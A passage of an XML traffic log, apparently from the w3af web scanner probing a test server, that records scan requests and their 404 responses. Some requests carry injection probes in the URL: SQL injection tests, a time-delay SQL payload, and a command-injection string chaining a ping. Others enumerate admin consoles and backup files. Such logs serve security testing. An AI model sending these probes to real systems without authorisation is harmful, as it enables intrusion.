                </httpresponse>
            </http-transaction>
            <http-transaction id="123">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L1R3Z1ZILmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGguSFZnd1Q=
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="860">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/lq5nc%3C%2F-%3Elq5nc%2F%2Alq5nc%22lq5nclq5nc%27lq5nclq5nc%60lq5nclq5nc+%3D HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="785">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/12%22+AND+%2212%22%3D%2213 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="164">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="830">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/12%27+AND+%2712%27%3D%2713 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="696">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="704">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="203">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="204">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="205">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="206">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="207">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="209">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="211">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="212">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="213">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="214">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="215">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="217">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="218">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="219">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
